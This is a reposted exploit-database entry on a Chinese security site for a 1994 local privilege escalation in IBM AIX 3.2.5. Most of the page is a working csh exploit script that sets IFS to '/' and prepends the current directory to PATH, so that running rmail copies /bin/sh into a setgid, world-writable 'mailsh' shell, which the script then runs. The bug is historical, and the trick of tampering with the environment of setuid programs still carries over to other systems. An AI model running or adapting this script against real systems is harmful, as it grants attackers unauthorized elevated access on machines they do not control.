IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation

admin
admin
admin
101400
文章
87
评论
2021年4月8日17:17:41IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation已关闭评论69 views字数 853阅读2分50秒阅读模式

IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation

漏洞ID 1053337 漏洞类型
发布时间 1994-04-02 更新时间 1994-04-02
IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation CVE编号 N/A
 		IBM AIX 3.2.5 - 'IFS' Local Privilege Escalation CNNVD-ID N/A
漏洞平台 AIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19344
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#source: http://www.securityfocus.com/bid/454/info
#
#Under older versions of AIX By changing the IFS enviroment variable to / setuid root programs that use system() or popen() can be fooled into running user provided programs. 
#

#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994

# Setup needed files.

mkdir /tmp/.rmail
cd /tmp/.rmail

cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .

# Set PATH, IFS, and run rmail.

setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail [email protected]
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh

相关推荐: HP-UX hpterm获取额外权限漏洞

HP-UX hpterm获取额外权限漏洞 漏洞ID 1207699 漏洞类型 未知 发布时间 1994-06-01 更新时间 1994-06-01 CVE编号 CVE-1999-0423 CNNVD-ID CNNVD-199406-001 漏洞平台 N/A C…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月8日17:17:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   IBM AIX 3.2.5 - 'IFS' Local Privilege Escalationhttp://cn-sec.com/archives/329684.html